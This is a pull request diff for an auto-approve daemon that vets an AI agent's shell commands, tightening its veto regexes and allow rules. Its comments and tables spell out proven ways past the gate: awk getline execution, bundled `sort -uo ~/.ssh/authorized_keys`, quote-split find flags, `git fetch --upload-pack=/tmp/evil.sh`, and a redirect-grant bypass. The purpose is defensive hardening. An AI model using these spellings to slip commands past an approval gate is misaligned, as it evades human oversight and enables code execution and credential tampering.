### PR TITLE
Phase 3: composed coverage, loop residue, git -c scoping

### DIFF
--- a/.context/approval-rate-baseline-2026-08.md
+++ b/.context/approval-rate-baseline-2026-08.md
@@ -214,14 +214,14 @@ through the real `evaluateDeterministic`, all on this branch:
 |---|---|---|
 | `ssh hallu nvidia-smi \| head -5` | null | approve (composed: "ssh hallu" + "head") |
 | `python3 analyze.py \| grep -c error` | null | approve (composed) |
-| `uv run pytest \| tail -5` | null | approve (`build-test:uv run pytest`) |
+| `uv run pytest \| tail -5` | approve (already: `build-test:uv run pytest`) | approve (unchanged — not a phase-3 win; listed as a control) |
 | `git switch -c feature/new-thing` (#962) | null | approve (`vcs-write:git switch`) |
 | `git commit -c abc123 -m redo` (#962) | null | approve (`vcs-write:git commit`) |
 | `git status \| head && git checkout main && git pull -q` (#996 s3) | null | approve |
 | `for p in ...; do printf ...; gh pr checks $p \| head; done` (#996 s4) | null | approve |
 | `while read l; do grep x $l; done < list.txt` | null | approve (`read-only:grep`) |
 | `git -c core.hooksPath=/tmp/evil commit` | null | null (positional veto holds) |
-| `ssh hallu $(cat secret)` | null | null (exec-primitive binds allow matches) |
+| `ssh hallu $(cat secret)` | null | null (`hasShellControl` refuses the command substitution before matching) |
 
 Curation: find/tr/comm/paste/nl/rev + sort/tree/diff (the latter three WITH
 scoped `-o`/`--output` vetoes — `sort -o out in` stays null), printf/read

--- a/.context/approval-rate-baseline-2026-08.md
+++ b/.context/approval-rate-baseline-2026-08.md
@@ -204,3 +204,27 @@ branch:
 Re-measure against a real PermissionRequest corpus (REMI_HOOK_DEBUG capture)
 once one exists; #996's 50%+13% miss buckets are the population these grants
 target.
+
+## Phase 3 addendum (2026-08-15 — composed coverage, loop residue, curation, #962)
+
+Probes under the owner's REAL `~/.remi/config.toml` (trusted + allow list),
+through the real `evaluateDeterministic`, all on this branch:
+
+| shape | before | after |
+|---|---|---|
+| `ssh hallu nvidia-smi \| head -5` | null | approve (composed: "ssh hallu" + "head") |
+| `python3 analyze.py \| grep -c error` | null | approve (composed) |
+| `uv run pytest \| tail -5` | null | approve (`build-test:uv run pytest`) |
+| `git switch -c feature/new-thing` (#962) | null | approve (`vcs-write:git switch`) |
+| `git commit -c abc123 -m redo` (#962) | null | approve (`vcs-write:git commit`) |
+| `git status \| head && git checkout main && git pull -q` (#996 s3) | null | approve |
+| `for p in ...; do printf ...; gh pr checks $p \| head; done` (#996 s4) | null | approve |
+| `while read l; do grep x $l; done < list.txt` | null | approve (`read-only:grep`) |
+| `git -c core.hooksPath=/tmp/evil commit` | null | null (positional veto holds) |
+| `ssh hallu $(cat secret)` | null | null (exec-primitive binds allow matches) |
+
+Curation: awk/find/tr/comm/paste/nl/rev + sort/tree/diff (the latter three WITH
+scoped `-o`/`--output` vetoes — `sort -o out in` stays null), printf/read
+neutral, git fetch (vcs-read), git pull (vcs-write). #999's grammar table was
+found already implemented; the composed allow+group pass was the actual
+remaining blocker for allow-only prefixes.

--- a/.context/approval-rate-baseline-2026-08.md
+++ b/.context/approval-rate-baseline-2026-08.md
@@ -223,8 +223,17 @@ through the real `evaluateDeterministic`, all on this branch:
 | `git -c core.hooksPath=/tmp/evil commit` | null | null (positional veto holds) |
 | `ssh hallu $(cat secret)` | null | null (exec-primitive binds allow matches) |
 
-Curation: awk/find/tr/comm/paste/nl/rev + sort/tree/diff (the latter three WITH
+Curation: find/tr/comm/paste/nl/rev + sort/tree/diff (the latter three WITH
 scoped `-o`/`--output` vetoes — `sort -o out in` stays null), printf/read
 neutral, git fetch (vcs-read), git pull (vcs-write). #999's grammar table was
 found already implemented; the composed allow+group pass was the actual
 remaining blocker for allow-only prefixes.
+
+**Correction (#1062, adversarial review of this branch):** `awk` was
+curated here on the mistaken belief that `EXEC_SCOPED_VETOES`'s
+system()/pipe-to-shell regex covered every dangerous awk program. It does
+not — awk is Turing-complete and the regex is raw-text pattern matching, not
+a parser — and the bypass was proven by execution (arbitrary command exec via
+`cmd | getline`, file write/read via `print > "path"` / `getline < "path"`
+entirely inside the program's own quoted string). `awk` was removed from
+`read-only` entirely; see `permission-groups.ts`'s comment at that list.

--- a/packages/daemon/src/auto-approve/auto-approve-service.ts
+++ b/packages/daemon/src/auto-approve/auto-approve-service.ts
@@ -31,7 +31,7 @@ import {
   parseMultiChoiceDecision,
 } from './multichoice.ts';
 import { matchAllowPattern, matchSubstringPattern } from './pattern-matcher.ts';
-import { matchGroups, matchGroupsBroad } from './permission-groups.ts';
+import { matchComposedCommand, matchGroups, matchGroupsBroad } from './permission-groups.ts';
 import { type PrecedentReader, precedentMayAuthorize, signatureForOperation } from './precedent.ts';
 import { buildPrompt } from './prompt-builder.ts';
 import type { DecidingLayer } from './risk-bands.ts';
@@ -634,11 +634,24 @@ export class AutoApproveService {
   /**
    * The deterministic, pre-LLM portion of `evaluate()` ONLY: the user's own
    * `deny`/`deny_groups` (checked first, always win), then `allow`
-   * (`matchAllowPattern`), then the level's `approve_groups` (`matchGroups`)
-   * -- the exact matcher calls, in the exact order, `evaluate()` runs before
+   * (`matchAllowPattern`), then the level's `approve_groups` (`matchGroups`),
+   * then -- only when both of those miss and the request is a Bash command --
+   * the UNION of the two (`matchComposedCommand`, #1057 phase 3 commit 1) --
+   * the exact matcher calls, in the exact order, `evaluate()` runs before
    * it ever considers precedent or the LLM. A pure function of (toolName,
    * toolInput) and this service's own config: no network, no model, no
    * queue, no precedent, no design-question routing.
+   *
+   * The composed pass exists because `matchAllowPattern` and `matchGroups`
+   * each require EVERY segment of a compound Bash command to be covered by
+   * THEIR OWN source alone, so a chain covered only by the union of the two
+   * -- `ssh hallu nvidia-smi | head -2` (allow owns `ssh hallu`; `read-only`
+   * owns `head`) -- fails both and reaches the LLM for something the user's
+   * own config already covers twice over, once per segment. Placed AFTER
+   * both single-source passes so their reasoning strings and outcomes are
+   * unchanged for every chain either one alone already covers -- composition
+   * only ever adds approvals for chains that need BOTH sources at once. See
+   * `matchComposedCommand`'s own doc for the per-segment veto dispatch.
    *
    * #1024: extracted so a caller that must decide BEFORE the LLM may ever
    * run (the gate's subagent-tagged hook-time path, which ADR 0004 forbids
@@ -646,12 +659,15 @@ export class AutoApproveService {
    * re-implementing them -- the exact drift ADR 0015/0017 warn about for
    * the shared catastrophic-pattern list, here avoided by construction:
    * `evaluate()` below calls this and must never duplicate its checks
-   * inline.
+   * inline. The composed pass applies identically at hook time for a
+   * subagent -- no special-casing; ADR 0004 already routes anything this
+   * method does not decide to the same render-time path either way.
    *
    * Returns:
-   *   - `{decision: 'approve', reasoning}` -- the user's own `allow` list or
-   *     `approve_groups` covers this call. Safe to act on directly; this is
-   *     the same 0ms verdict `evaluate()` returns for the identical match.
+   *   - `{decision: 'approve', reasoning}` -- the user's own `allow` list,
+   *     `approve_groups`, or their union covers this call. Safe to act on
+   *     directly; this is the same 0ms verdict `evaluate()` returns for the
+   *     identical match.
    *   - `{decision: 'deny-covered', reasoning, denySource}` -- the user's own
    *     `deny` list or `deny_groups` covers this call. NOT a verdict a
    *     hook-time caller may act on by itself: `evaluate()` turns this into
@@ -714,6 +730,22 @@ export class AutoApproveService {
     const approveGroupMatch = matchGroups(toolName, toolInput, policy.approveGroups);
     if (approveGroupMatch !== null) {
       return { decision: 'approve', reasoning: `approve-matched group: "${approveGroupMatch}"` };
+    }
+    // #1057 phase 3 commit 1: only Bash carries a compound command that could
+    // need the union -- every other tool already decided above via a bare
+    // tool-name match against either list, and `matchComposedCommand` only
+    // knows how to walk a Bash command string.
+    if (toolName === 'Bash') {
+      const command = typeof toolInput['command'] === 'string' ? toolInput['command'] : '';
+      if (command !== '') {
+        const composed = matchComposedCommand(command, policy.allow, policy.approveGroups);
+        if (composed !== null && composed.allowHit !== null && composed.groupHit !== null) {
+          return {
+            decision: 'approve',
+            reasoning: `composed allow+group coverage: "${composed.allowHit}" + "${composed.groupHit}"`,
+          };
+        }
+      }
     }
     return null;
   }

--- a/packages/daemon/src/auto-approve/permission-groups.ts
+++ b/packages/daemon/src/auto-approve/permission-groups.ts
@@ -18,16 +18,19 @@
  *    of those tokens legitimately appears in a curated read command, so the
  *    veto can only catch a write that slipped past a read prefix.
  *  - Commands whose read form can be flipped to a write by an AMBIGUOUS short
- *    flag are EXCLUDED from the curated set whenever no veto already closes
- *    that specific flag: `sort -o`, `gh api -X`. `find -delete` and `awk`
- *    system()/pipe-to-shell are the opposite shape (#1057 phase 3, commit 3)
- *    — the bare command IS curated, because `shell-safety.ts`'s
- *    `hasExecPrimitive` already refuses exactly the dangerous forms
- *    (`EXEC_PRIMITIVE_TOKEN` for `-delete`/`-exec`/..., `EXEC_SCOPED_VETOES`
- *    for awk's `system()`/pipe-to-shell), consulted by `matchCoveredCommand`
- *    for every matched segment regardless of which group owns the prefix.
- *    `sort -o` has no such veto and stays excluded; the two are not
- *    interchangeable, and a future addition must check which shape it is
+ *    flag are curated ONLY together with a veto that closes that specific flag:
+ *    `sort`/`tree`/`diff` are curated with a `SCOPED_VETOES` `-o`/`--output`
+ *    entry (#1057 phase 3), and `find` with `EXEC_PRIMITIVE_TOKEN` +
+ *    `MUTATION_TOKEN` covering `-delete`/`-exec`/`-fprint*`/`-fls`/`-okdir`,
+ *    consulted by `matchCoveredCommand` for every matched segment regardless
+ *    of which group owns the prefix. `gh api -X` remains genuinely EXCLUDED:
+ *    no veto closes its write flag. `awk` was tried and REMOVED (#1057 phase 3
+ *    adversarial review): it is a Turing-complete interpreter whose
+ *    `cmd | getline`, in-program `print > "file"`/`getline < "file"`, and
+ *    quote-spliced `sys""tem(` cannot be closed by any flag or pattern rule —
+ *    the exec-scoped regex caught three spellings, not the forms.
+ *    The two shapes are not interchangeable, and a future addition must check
+ *    whether a veto genuinely closes the flag (not merely a few spellings of it)
  *    before assuming either precedent applies. Users can add an excluded
  *    command via the `allow` list at their own discretion (per-segment
  *    prefix, not substring).

--- a/packages/daemon/src/auto-approve/permission-groups.ts
+++ b/packages/daemon/src/auto-approve/permission-groups.ts
@@ -1575,10 +1575,16 @@ export const BUILTIN_GROUPS: Readonly<Record<string, PermissionGroup>> = {
       // pipe-to-shell entry, `find` via `EXEC_PRIMITIVE_TOKEN`'s
       // `-delete`/`-exec`/`-execdir`/`-ok`/`-okdir`/`-fprint*`/`-fls` entries
       // (both shell-safety.ts, consulted by `matchCoveredCommand`
-      // unconditionally). So, unlike `sort -o` (still excluded above: no such
-      // veto exists for it), the bare command name is safe to curate here.
+      // unconditionally). So the bare command name is safe to curate here.
       'awk',
       'find',
+      // `sort`/`tree`/`diff` are read transforms whose one write escape
+      // (`-o`/`--output`) is refused by their SCOPED_VETOES entries below --
+      // added together with the veto, never bare, because `sort -o out in`
+      // is a real file write the name alone cannot reveal.
+      'sort',
+      'tree',
+      'diff',
       // Pure text/stream transforms verified to carry no destination-writing
       // flag on either BSD or GNU builds: stdin/stdout (or their file
       // operands, read-only) only.
@@ -1811,6 +1817,17 @@ const SCOPED_VETOES: ReadonlyArray<{ family: RegExp; flag: RegExp }> = [
   { family: /^sed\b/, flag: /(^|\s)(-i|--in-place)/ },
   // `bun test --preload <file>` executes an arbitrary file before the suite.
   { family: /^bunx?\b/, flag: /(^|\s)--preload(\s|=|$)/ },
+  // `sort` is a pure stream transform except `-o`/`--output`, which writes
+  // the result to an arbitrary file. No read sort flag starts with `-o`, and
+  // the prefix form catches the attached spelling (`-ofile`) too.
+  { family: /^sort\b/, flag: /(^|\s)(-o|--output)/ },
+  // `tree -o filename` writes the listing to a file (no long form exists).
+  { family: /^tree\b/, flag: /(^|\s)-o/ },
+  // Neither BSD nor GNU diff has a `-o`/`--output` write flag today; this
+  // entry is defensive parity with `sort`/`tree` so a build that grows one
+  // (or a lookalike binary) stays refused, and the long-standing
+  // `diff ... -o /tmp/patch` adversarial pin keeps its null outcome.
+  { family: /^diff\b/, flag: /(^|\s)(-o|--output)/ },
 ];
 
 /** True if a family-scoped veto flag applies to this segment. */

--- a/packages/daemon/src/auto-approve/permission-groups.ts
+++ b/packages/daemon/src/auto-approve/permission-groups.ts
@@ -1802,6 +1802,23 @@ export const BUILTIN_GROUPS: Readonly<Record<string, PermissionGroup>> = {
  * command, so matching one can only mean a write snuck past a read prefix
  * (e.g. `git diff --output=f`, `biome check --write`, `find . -delete`).
  *
+ * `find`'s file-writing/exec primitives (`-fprintf`/`-fprint0`/`-fprint`/
+ * `-fls`/`-okdir`, alongside the pre-existing `-delete`/`-exec`/`-execdir`/
+ * `-ok`) are listed here too, in addition to `EXEC_PRIMITIVE_TOKEN`
+ * (shell-safety.ts) which already vetoes all of them (#1062 C3). The two are
+ * not redundant: `EXEC_PRIMITIVE_TOKEN` is consulted by `matchCoveredCommand`
+ * only against the RAW segment text, while THIS token is the one
+ * `readSegmentVeto` re-checks against the quote-NORMALIZED word list
+ * (`shellWords`, below). Before this addition, `find . -fprin"t" /tmp/x`
+ * unquoted to `-fprint` — a spelling `EXEC_PRIMITIVE_TOKEN`'s raw-text regex
+ * never saw (it only matched the still-quoted original) and that was ALSO
+ * absent from this list, so nothing caught it on either pass. `-fprint` is
+ * ordered ahead of `-fprintf`/`-fprint0` deliberately, but order does not
+ * actually matter for a `.test()` alternation with a trailing boundary
+ * group: a failed boundary check on the shorter alternative backtracks into
+ * the longer one at the same position, so both are still verified to match
+ * their full spelling by the adversarial test suite.
+ *
  * Exported for tests ONLY (#957 review). `shell-safety`'s per-segment-veto
  * tests need the real predicate rather than a hand-copied one: a duplicate
  * stays byte-identical right up until someone widens this list, at which
@@ -1809,7 +1826,7 @@ export const BUILTIN_GROUPS: Readonly<Record<string, PermissionGroup>> = {
  * they no longer have.
  */
 export const MUTATION_TOKEN =
-  /(^|\s)(-X|--method|--field|--raw-field|--input|--output|--write|--apply|--fix|-delete|-exec|-execdir|-ok)(\s|=|$)/;
+  /(^|\s)(-X|--method|--field|--raw-field|--input|--output|--write|--apply|--fix|-delete|-exec|-execdir|-okdir|-ok|-fprintf|-fprint0|-fprint|-fls)(\s|=|$)/;
 
 /** True if a name is a built-in group. */
 export function isKnownGroup(name: string): boolean {
@@ -1835,16 +1852,67 @@ const SCOPED_VETOES: ReadonlyArray<{ family: RegExp; flag: RegExp }> = [
   // `bun test --preload <file>` executes an arbitrary file before the suite.
   { family: /^bunx?\b/, flag: /(^|\s)--preload(\s|=|$)/ },
   // `sort` is a pure stream transform except `-o`/`--output`, which writes
-  // the result to an arbitrary file. No read sort flag starts with `-o`, and
-  // the prefix form catches the attached spelling (`-ofile`) too.
-  { family: /^sort\b/, flag: /(^|\s)(-o|--output)/ },
+  // the result to an arbitrary file. Neither BSD nor GNU `sort` has any OTHER
+  // short flag containing the letter `o` (`-b -c -C -d -f -g -i -k -m -M -n
+  // -R -r -S -s -t -T -u -V -z -h` — none), so 'o' appearing ANYWHERE in a
+  // leading short-flag cluster can only mean `-o` is bundled into it, no
+  // matter which position: `-ro`/`-uo`/`-rno` all write exactly like bare
+  // `-o` (#1062 C2 — the previous `/(^|\s)(-o|--output)/` only matched `-o`
+  // at a word boundary, so `sort -ro out.txt in.txt` and `sort -uo
+  // ~/.ssh/authorized_keys pub.txt` walked straight past it). The trailing
+  // `-[A-Za-z]*o` half needs no boundary after its own `o` and no anchor at
+  // the flag's start beyond the leading `-`, only `(^|\s)` before it, so it
+  // cannot false-positive on `--output`: a `-` immediately followed by
+  // another `-` (the second dash of a long flag) breaks `[A-Za-z]*`'s
+  // required all-letters run at that starting position, and starting the
+  // match at the SECOND dash instead fails the `(^|\s)` boundary (it is
+  // preceded by the first dash, not whitespace/start) — hence the explicit
+  // `--output` alternative alongside it.
+  { family: /^sort\b/, flag: /(^|\s)-[A-Za-z]*o|(^|\s)--output/ },
   // `tree -o filename` writes the listing to a file (no long form exists).
-  { family: /^tree\b/, flag: /(^|\s)-o/ },
+  // Same bundled-cluster reasoning as `sort` above: no other `tree` short
+  // flag contains `o` (`-a -d -f -i -L -n ...`), so `tree -no out.txt`
+  // bundling `-n` (no indent) ahead of `-o` was the same bypass (#1062 C2).
+  { family: /^tree\b/, flag: /(^|\s)-[A-Za-z]*o/ },
   // Neither BSD nor GNU diff has a `-o`/`--output` write flag today; this
   // entry is defensive parity with `sort`/`tree` so a build that grows one
   // (or a lookalike binary) stays refused, and the long-standing
-  // `diff ... -o /tmp/patch` adversarial pin keeps its null outcome.
+  // `diff ... -o /tmp/patch` adversarial pin keeps its null outcome. diff has
+  // no SHORT flag containing `o` besides `-o` itself (unlike sort/tree, it is
+  // not curated bare here — it is excluded from `read-only` entirely, see
+  // that list's comment — so the narrower word-boundary form is left as-is;
+  // widening it costs nothing today but buys no proven case either).
   { family: /^diff\b/, flag: /(^|\s)(-o|--output)/ },
+  // `git fetch --upload-pack=/tmp/evil.sh <repo>` runs `/tmp/evil.sh` LOCALLY
+  // instead of the real `git-upload-pack` on the far end (proven by
+  // execution, #1062 C4, CRITICAL RCE) — `git`'s own manual documents this
+  // exact mechanism. `--receive-pack` is the identical primitive for the
+  // push/receive side, and `--exec` is `git fetch`'s own alias for
+  // `--upload-pack` (git-fetch(1): "When given, and the repository to fetch
+  // from is handled by git fetch-pack, --exec=<upload-pack> is passed to the
+  // command"). This fires for ANY `git` segment, not just `fetch` — the
+  // write-side `vcs-write` group already refuses all three via
+  // `write-flag-safety.ts`'s `dangerousLongFlags` (verified: `git pull
+  // --upload-pack=/tmp/evil.sh /tmp/repo` was already null before this
+  // change), so this entry closes the matching gap on the READ side, where
+  // `git fetch` sits in `vcs-read` with no `segmentVeto` of its own and
+  // therefore falls through to this module's default `readSegmentVeto` /
+  // `hasScopedVeto`.
+  //
+  // Known, deliberately UNFIXED residuals of the same remote-exec family
+  // (documented per review instruction, not silently left as an assumed
+  // gap):
+  //   - `git fetch ext::sh -c id` is inert UNLESS the user's own gitconfig
+  //     sets `protocol.ext.allow` (git refuses the `ext::` transport by
+  //     default); not a bypass of anything this veto promises.
+  //   - `--recurse-submodules` fetches each submodule's remote-configured
+  //     `.gitmodules` URL, which is within `git fetch`'s ordinary
+  //     remote-read nature (the same trust `git fetch origin` already
+  //     carries), not a new primitive.
+  //   - `--config-env=` is not matched by this veto at all; it is inert on
+  //     its own without a second, matching environment-variable segment
+  //     already present, and adding that detection is out of scope here.
+  { family: /^git\b/, flag: /(^|\s)(--upload-pack|--receive-pack|--exec)(\s|=)/ },
 ];
 
 /** True if a family-scoped veto flag applies to this segment. */

--- a/packages/daemon/src/auto-approve/permission-groups.ts
+++ b/packages/daemon/src/auto-approve/permission-groups.ts
@@ -2162,25 +2162,52 @@ export interface ComposedMatch {
  * segment it matches:
  *
  *   - A segment whose matched prefix is owned ONLY by `allow` gets exactly
- *     `matchAllowPattern`'s treatment — no group veto is layered on top. The
- *     exec-primitive rule (`hasExecPrimitive(seg) && !hasExecPrimitive(hit)`)
- *     still applies, because `matchCoveredCommand` runs it unconditionally
- *     after any `vetoForMatched` verdict, allow included.
+ *     `matchAllowPattern`'s treatment — no group veto is layered on top, and
+ *     (as of #1062 C5, below) no ADR 0026 pre-pass rewrites the text it is
+ *     judged against either. The exec-primitive rule
+ *     (`hasExecPrimitive(seg) && !hasExecPrimitive(hit)`) still applies,
+ *     because `matchCoveredCommand` runs it unconditionally after any
+ *     `vetoForMatched` verdict, allow included.
  *   - A segment whose matched prefix is owned by a GROUP gets `matchGroups`'s
  *     own `vetoedByOwnerFor` dispatch, unchanged (sensitive-path conjunct,
- *     `segmentVeto`, the scratch/artifact-clean per-index state walks).
+ *     `segmentVeto`, the scratch/artifact-clean per-index state walks) —
+ *     MINUS the redirect-grant pre-pass, per the note below.
  *   - A prefix owned by BOTH sources approves the segment when EITHER
  *     source's veto passes — the same first-passing-owner disjunction
  *     `matchGroups` already uses across multiple group owners, with "allow"
  *     simply added as one more candidate owner.
  *
- * The ADR 0026 pre-passes (heredoc excision, redirect grants) run exactly as
- * they do in `matchGroups`: heredoc excision unconditionally, redirect grants
- * gated on `scratch`/`fs-write` GROUP membership only. Allow membership never
- * extends that gate — `allow = ["python3"]` with no `fs-write` group must NOT
- * make a redirect grant available that group membership alone would not have
- * granted; see the paired test for the positive case (both active, and the
- * grant composes with an allow-covered head).
+ * This function does NOT run the ADR 0026 pre-passes (heredoc excision,
+ * `sanitizeCommandForRedirectGrants`) that `matchGroups` runs, and that is a
+ * DELIBERATE divergence from `matchGroups`, not an oversight to bring back in
+ * line. Those two pre-passes DELETE syntax (a redirect clause, a heredoc
+ * body) from the whole command text before per-segment judgment ever begins
+ * — they are a GROUP-ONLY feature (ADR 0026: the grant is earned by group
+ * membership, e.g. `fs-write`/`scratch`), and running them here applied that
+ * deletion to EVERY segment regardless of which source owns it, allow
+ * included. That was #1062's C5, a CONFIRMED bypass proven by execution:
+ * `python3 evil.py > out.txt && ls` (allow=["python3"], groups=["read-only",
+ * "fs-write"]) approved, because the `> out.txt` redirect was deleted by the
+ * `fs-write` grant before `python3 evil.py` — an ALLOW-owned segment — was
+ * ever handed to `hasShellControl`. `matchAllowPattern` alone refuses that
+ * exact segment (`hasShellControl` sees the live `>` and vetoes the whole
+ * command), so the composed pass was granting `allow` a capability
+ * `matchAllowPattern` itself does not have. Same story for a heredoc body
+ * on an allow-owned head (`ssh hallu bash <<EOF\n...\nEOF`): excision made
+ * the body invisible to judgment entirely.
+ *
+ * `matchGroups` (the pure-group path, called by `evaluateDeterministic`
+ * BEFORE this function) still runs both pre-passes exactly as before — a
+ * command whose ONLY qualifying segments are group-owned, and that NEEDS a
+ * redirect grant or heredoc excision to pass, already matched there and
+ * never reaches this function at all. The consequence is narrow and
+ * accepted: a chain that genuinely needs BOTH a group redirect grant AND an
+ * allow-owned prefix in the SAME command (`cat a > notes.md && ssh hallu x`,
+ * group redirect grant on the first segment, allow prefix on the second) now
+ * fails closed here and escalates, where before it silently approved. No
+ * group's redirect grant was ever scoped to interact with the allow list, so
+ * losing that composition is the same shape of loss as any other
+ * over-cautious escalation, not a missing feature.
  */
 export function matchComposedCommand(
   command: string,
@@ -2196,19 +2223,12 @@ export function matchComposedCommand(
   const known = groupNames.filter(isKnownGroup);
   if (commandAllowPrefixes.length === 0 && known.length === 0) return null;
 
-  // Same pre-passes as `matchGroups`, same gating (group membership only --
-  // see the function doc for why allow membership must never extend it).
-  const heredocExcised = exciseHeredocsForGroups(trimmed);
-  const scratchActive = known.includes('scratch');
-  const fsWriteActive = known.includes('fs-write');
-  const redirectGrants =
-    scratchActive || fsWriteActive
-      ? sanitizeCommandForRedirectGrants(heredocExcised, { scratchActive, fsWriteActive })
-      : null;
-  const sanitized = redirectGrants?.command ?? heredocExcised;
-  const artifactPoison = known.includes('artifact-clean')
-    ? artifactCleanPoisonWalk(sanitized)
-    : null;
+  // No heredoc-excision / redirect-grant pre-pass here — see the function
+  // doc's #1062 C5 note for why this path evaluates the RAW command, unlike
+  // `matchGroups`. `artifactCleanPoisonWalk` is still run, over the SAME
+  // `trimmed` text `matchCoveredCommand` below receives, so the two agree by
+  // segment index exactly as `matchGroups` requires of its own pre-pass.
+  const artifactPoison = known.includes('artifact-clean') ? artifactCleanPoisonWalk(trimmed) : null;
 
   // Map each prefix to every owning source, in request order, `allow` first.
   // A prefix present in both an allow entry and a group's command list keeps
@@ -2228,11 +2248,15 @@ export function matchComposedCommand(
     }
   }
 
-  const groupVeto = vetoedByOwnerFor(redirectGrants, artifactPoison);
+  // `redirectGrants` is always null on this path (no pre-pass ran), so
+  // `scratch`'s owner-check below falls back to `scratchTargetVeto`'s
+  // no-tracked-directory case for every segment -- fails closed, same
+  // direction as the heredoc/redirect loss documented above.
+  const groupVeto = vetoedByOwnerFor(null, artifactPoison);
   let allowHit: string | null = null;
   let groupHit: string | null = null;
   const hit = matchCoveredCommand(
-    sanitized,
+    trimmed,
     [...prefixOwners.keys()],
     readSegmentVeto,
     (segment, matchedPrefix, index) => {

--- a/packages/daemon/src/auto-approve/permission-groups.ts
+++ b/packages/daemon/src/auto-approve/permission-groups.ts
@@ -1566,17 +1566,34 @@ export const BUILTIN_GROUPS: Readonly<Record<string, PermissionGroup>> = {
       'mdfind',
       'du',
       'df',
-      // #1057 phase 3 commit 3: evidence-based additions from the #996/#999
-      // corpora. `awk` and `find` each have a read form flippable to code
-      // execution / deletion by a flag or program body this list cannot see
-      // by name alone -- but BOTH already have a veto that fires on exactly
-      // that shape for EVERY matched segment, regardless of which curated
-      // prefix matched it: `awk` via `EXEC_SCOPED_VETOES`'s system()/
-      // pipe-to-shell entry, `find` via `EXEC_PRIMITIVE_TOKEN`'s
-      // `-delete`/`-exec`/`-execdir`/`-ok`/`-okdir`/`-fprint*`/`-fls` entries
-      // (both shell-safety.ts, consulted by `matchCoveredCommand`
-      // unconditionally). So the bare command name is safe to curate here.
-      'awk',
+      // #1057 phase 3 commit 3: evidence-based addition from the #996/#999
+      // corpora. `find` has a read form flippable to deletion / arbitrary
+      // file-write by a flag this list cannot see by name alone -- but it
+      // has a veto that fires on exactly that shape for EVERY matched
+      // segment, regardless of which curated prefix matched it:
+      // `EXEC_PRIMITIVE_TOKEN`'s `-delete`/`-exec`/`-execdir`/`-ok`/`-okdir`/
+      // `-fprint*`/`-fls` entries (shell-safety.ts, consulted by
+      // `matchCoveredCommand` unconditionally) PLUS the mirrored spellings in
+      // `MUTATION_TOKEN` (below) that close the quote-splitting gap the raw
+      // `EXEC_PRIMITIVE_TOKEN` regex alone missed (#1062 C3: `find . -fprin"t"
+      // /tmp/x` unquotes to `-fprint` and was never checked against anything
+      // but the still-quoted raw text). So the bare command name is safe to
+      // curate here.
+      //
+      // `awk` is deliberately ABSENT (#1062 C1, CRITICAL RCE, adversarial
+      // review of this branch). It was curated on the same theory as `find`
+      // above -- that `EXEC_SCOPED_VETOES`'s system()/pipe-to-shell entry
+      // covers every dangerous shape -- and that theory is false: awk is
+      // Turing-complete, and the veto is a raw-text regex looking for
+      // `system(`/`| sh` literally in the program text. Proven bypasses that
+      // regex never sees: `cmd | getline r` (arbitrary command execution with
+      // no `system(` token at all), `print > "/path"` and `getline < "/path"`
+      // (file write/read entirely inside the program's own quoted string,
+      // invisible to a check that only looks for shell redirection), and
+      // trivial string-splicing of the literal token itself (`sys""tem(`).
+      // None of these can be curated by a better flag/pattern rule -- the
+      // program body is an arbitrary script, not an argument list -- so `awk`
+      // is refused unconditionally at every level, like `curl`/`wget`/`perl`.
       'find',
       // `sort`/`tree`/`diff` are read transforms whose one write escape
       // (`-o`/`--output`) is refused by their SCOPED_VETOES entries below --

--- a/packages/daemon/src/auto-approve/permission-groups.ts
+++ b/packages/daemon/src/auto-approve/permission-groups.ts
@@ -27,6 +27,7 @@
  * user allow list uses the same primitives (#536).
  */
 
+import { looksLikeToolName } from './pattern-matcher.ts';
 import { COMMAND_WRAPPERS, SHELL_C_BINARIES } from './risk-bands.ts';
 import {
   isSensitiveWritePath,
@@ -1814,6 +1815,62 @@ function readSegmentVeto(segment: string): boolean {
 }
 
 /**
+ * The group-owned per-segment veto dispatch, shared by `matchGroups` and
+ * `matchComposedCommand` (#1057 phase 3, commit 1) — the SAME function, not a
+ * copy, for the reason `evaluateDeterministic` gives for its own extraction:
+ * a duplicated security check drifts the moment one copy is edited and the
+ * other is not (ADR 0015/0017's warning, applied here to this dispatch
+ * instead of the catastrophic-pattern list). Built once per Bash command from
+ * that command's own ADR 0026 pre-pass state (`redirectGrants`,
+ * `artifactPoison`), then called per matched segment with the OWNER whose
+ * prefix matched.
+ */
+function vetoedByOwnerFor(
+  redirectGrants: RedirectGrantWalk | null,
+  artifactPoison: readonly boolean[] | null,
+): (owner: string, segment: string, prefix: string, index: number) => boolean {
+  return (owner, segment, prefix, index) => {
+    // The sensitive-destination axis is a GLOBAL conjunct, checked before any
+    // owner's own proof and never delegated to one. Found by the ADR 0023
+    // adversarial pass: the owner union below is disjunctive, so a prefix
+    // owned by both `fs-write` and `scratch` (`cp`, `mv`, `mkdir`, `touch`,
+    // `tee`) was approved the moment scratch's laxer proof held — and
+    // `scratchTargetVeto` never consulted `isSensitiveWritePath`. Measured
+    // develop -> this branch at BALANCED, a level this ADR does not even
+    // claim to touch:
+    //
+    //   cp /tmp/a /tmp/.env         develop: escalate -> branch: scratch:cp
+    //   mv /tmp/a /tmp/id_rsa       develop: escalate -> branch: scratch:mv
+    //   cp /tmp/a /tmp/.git/config  develop: escalate -> branch: scratch:cp
+    //
+    // It also falsified a shipped claim in `config.ts` ("the write groups
+    // refuse sensitive destinations regardless of prefix ... credentials
+    // (.env, id_rsa)"), which is exactly the ADR 0011 failure mode.
+    //
+    // Hoisting it here keeps the monotonicity the union was written for --
+    // adding a group cannot introduce a sensitive destination, so it still
+    // can only ADD approvals -- while restoring the property ADR 0010 wants:
+    // a deny-shaped check is broad, and must not be escapable by finding
+    // some OTHER owner whose positive proof happens to be laxer.
+    //
+    // Scoped to the MUTATING owners, not applied globally. A first cut
+    // applied it to every owner and broke three read tests
+    // (`jq .version package.json`, and two `/dev/null` redirect cases):
+    // `segmentTouchesSensitivePath` is a WRITE-side axis, and READING a
+    // sensitive path is exactly what `read-only` exists to allow.
+    if (MUTATING_GROUPS.has(owner) && segmentTouchesSensitivePath(segment)) return true;
+    if (owner === 'scratch') {
+      return scratchTargetVeto(segment, redirectGrants?.stateBySegment[index]?.scratch ?? null);
+    }
+    if (owner === 'artifact-clean') {
+      return artifactCleanVeto(segment, prefix, artifactPoison?.[index] ?? true);
+    }
+    const veto = BUILTIN_GROUPS[owner]?.segmentVeto ?? readSegmentVeto;
+    return veto(segment);
+  };
+}
+
+/**
  * Match a permission request against the named groups. Returns a descriptive
  * `"group:pattern"` string when matched, or null. Unknown group names are
  * ignored (validated separately at config load).
@@ -1890,45 +1947,7 @@ export function matchGroups(
